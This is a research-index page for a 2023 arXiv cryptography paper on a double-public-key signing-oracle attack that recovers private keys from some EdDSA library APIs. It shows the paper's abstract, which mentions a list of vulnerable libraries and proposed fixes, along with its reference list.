Papers
Topics
Authors
Recent
Assistant
AI Research Assistant
Well-researched responses based on relevant abstracts and paper content.
Custom Instructions Pro
Preferences or requirements that you'd like Emergent Mind to consider when generating responses.
Gemini 2.5 Flash
Gemini 2.5 Flash 161 tok/s
Gemini 2.5 Pro 50 tok/s Pro
GPT-5 Medium 36 tok/s Pro
GPT-5 High 37 tok/s Pro
GPT-4o 127 tok/s Pro
Kimi K2 197 tok/s Pro
GPT OSS 120B 435 tok/s Pro
Claude Sonnet 4.5 26 tok/s Pro
2000 character limit reached

Double Public Key Signing Function Oracle Attack on EdDSA Software Implementations (2308.15009v2)

Published 29 Aug 2023 in cs.CR

Abstract: EdDSA is a standardised elliptic curve digital signature scheme introduced to overcome some of the issues prevalent in the more established ECDSA standard. Due to the EdDSA standard specifying that the EdDSA signature be deterministic, if the signing function were to be used as a public key signing oracle for the attacker, the unforgeability notion of security of the scheme can be broken. This paper describes an attack against some of the most popular EdDSA implementations, which results in an adversary recovering the private key used during signing. With this recovered secret key, an adversary can sign arbitrary messages that would be seen as valid by the EdDSA verification function. A list of libraries with vulnerable APIs at the time of publication is provided. Furthermore, this paper provides two suggestions for securing EdDSA signing APIs against this vulnerability while it additionally discusses failed attempts to solve the issue.

Definition Search Book Streamline Icon: https://streamlinehq.com
References (25)
  1. N. Koblitz, “Elliptic curve cryptosystems,” Mathematics of Computation, vol. 48, pp. 203–209, 1987.
  2. V. S. Miller, “Use of elliptic curves in cryptography,” in Advances in Cryptology — CRYPTO ’85 Proceedings, H. C. Williams, Ed.   Berlin, Heidelberg: Springer Berlin Heidelberg, 1986, pp. 417–426.
  3. D. W. Kravitz, “Digital signature algorithm,” May 1993, U.S. Patent US5231668A.
  4. D. Johnson, A. Menezes, and S. Vanstone, “The elliptic curve digital signature algorithm (ecdsa),” International Journal of Information Security, vol. 1, no. 1, pp. 36–63, Aug 2001. [Online]. Available: https://doi.org/10.1007/s102070100002
  5. P. Q. Nguyen and I. E. Shparlinski, “The insecurity of the elliptic curve digital signature algorithm with partially known nonces,” Designs, Codes and Cryptography, vol. 30, no. 2, pp. 201–217, Sep 2003. [Online]. Available: https://doi.org/10.1023/A:1025436905711
  6. M. Brengel and C. Rossow, “Identifying key leakage of bitcoin users,” in Research in Attacks, Intrusions, and Defenses, M. Bailey, T. Holz, M. Stamatogiannakis, and S. Ioannidis, Eds.   Cham: Springer International Publishing, 2018, pp. 623–643.
  7. A. K. Lenstra, H. W. Lenstra, and L. Lovász, “Factoring polynomials with rational coefficients,” Mathematische Annalen, vol. 261, no. 4, pp. 515–534, Dec 1982. [Online]. Available: https://doi.org/10.1007/BF01457454
  8. D. Poulakis, “Some lattice attacks on dsa and ecdsa,” Applicable Algebra in Engineering, Communication and Computing, vol. 22, no. 5, pp. 347–358, Dec 2011. [Online]. Available: https://doi.org/10.1007/s00200-011-0154-4
  9. J. Breitner and N. Heninger, “Biased nonce sense: Lattice attacks against weak ecdsa signatures in cryptocurrencies,” in Financial Cryptography and Data Security, I. Goldberg and T. Moore, Eds.   Cham: Springer International Publishing, 2019, pp. 3–20.
  10. D. J. Bernstein, “Curve25519: New diffie-hellman speed records,” in Public Key Cryptography - PKC 2006, M. Yung, Y. Dodis, A. Kiayias, and T. Malkin, Eds.   Berlin, Heidelberg: Springer Berlin Heidelberg, 2006, pp. 207–228.
  11. D. J. Bernstein, N. Duif, T. Lange, P. Schwabe, and B.-Y. Yang, “High-speed high-security signatures,” Journal of Cryptographic Engineering, vol. 2, no. 2, pp. 77–89, Sep 2012. [Online]. Available: https://doi.org/10.1007/s13389-012-0027-1
  12. C. P. Schnorr, “Efficient identification and signatures for smart cards,” in Advances in Cryptology — CRYPTO’ 89 Proceedings, G. Brassard, Ed.   New York, NY: Springer New York, 1990, pp. 239–252.
  13. D. J. Bernstein, S. Josefsson, T. Lange, P. Schwabe, and B.-Y. Yang, “Eddsa for more curves,” Cryptology ePrint Archive, Paper 2015/677, 2015. [Online]. Available: https://eprint.iacr.org/2015/677
  14. S. Josefsson and I. Liusvaara, “Edwards-curve digital signature algorithm (EdDSA),” Tech. Rep., jan 2017.
  15. D. Moody, “Digital signature standard (DSS),” Tech. Rep., 2023.
  16. J. Brendel, C. Cremers, D. Jackson, and M. Zhao, “The provable security of ed25519: Theory and practice,” in 2021 IEEE Symposium on Security and Privacy (SP), 2021, pp. 1659–1676.
  17. K. Chalkias, F. Garillot, and V. Nikolaenko, “Taming the many eddsas,” in Security Standardisation Research, T. van der Merwe, C. Mitchell, and M. Mehrnezhad, Eds.   Cham: Springer International Publishing, 2020, pp. 67–90.
  18. luigi1111 and Riccardo ”fluffypony” Spagni, “Disclosure of a major bug in cryptonote based currencies,” May 2017. [Online]. Available: https://www.getmonero.org/2017/05/17/disclosure-of-a-major-bug-in-cryptonote-based-currencies.html
  19. N. Samwel, L. Batina, G. Bertoni, J. Daemen, and R. Susella, “Breaking ed25519 in wolfssl,” in Topics in Cryptology – CT-RSA 2018, N. P. Smart, Ed.   Cham: Springer International Publishing, 2018, pp. 1–20.
  20. L. Weissbart, S. Picek, and L. Batina, “One trace is all it takes: Machine learning-based side-channel attack on eddsa,” in Security, Privacy, and Applied Cryptography Engineering, S. Bhasin, A. Mendelson, and M. Nandi, Eds.   Cham: Springer International Publishing, 2019, pp. 86–105.
  21. Y. Romailler and S. Pelissier, “Practical fault attack against the ed25519 and eddsa signature schemes,” in 2017 Workshop on Fault Diagnosis and Tolerance in Cryptography (FDTC), 2017, pp. 17–24.
  22. D. Poddebniak, J. Somorovsky, S. Schinzel, M. Lochter, and P. Rösler, “Attacking deterministic signature schemes using fault attacks,” in 2018 IEEE European Symposium on Security and Privacy (EuroS&P), 2018, pp. 338–352.
  23. W. Cao, H. Shi, H. Chen, J. Chen, L. Fan, and W. Wu, “Lattice-based fault attacks on deterministic signature schemes of ecdsa and eddsa,” in Topics in Cryptology – CT-RSA 2022, S. D. Galbraith, Ed.   Cham: Springer International Publishing, 2022, pp. 169–195.
  24. A. Langley, M. Hamburg, and S. Turner, “Elliptic curves for security,” Tech. Rep., jan 2016.
  25. IANIX, “Things that use Ed25519,” Jun. 2023. [Online]. Available: https://ianix.com/pub/ed25519-deployment.html
Citations (1)
View on Semantic Scholar

Summary

We haven't generated a summary for this paper yet.

Ai Sparkles Streamline Icon: https://streamlinehq.com Summarize Now
Dice Question Streamline Icon: https://streamlinehq.com

Open Problems

We haven't generated a list of open problems mentioned in this paper yet.

Ai Sparkles Streamline Icon: https://streamlinehq.com Generate Now
Lightbulb Streamline Icon: https://streamlinehq.com

Continue Learning

We haven't generated follow-up questions for this paper yet.

Ai Sparkles Streamline Icon: https://streamlinehq.com Generate Now
List To Do Tasks Checklist Streamline Icon: https://streamlinehq.com

Collections

Sign up for free to add this paper to one or more collections.

User Circle Single Streamline Icon: https://streamlinehq.com Sign Up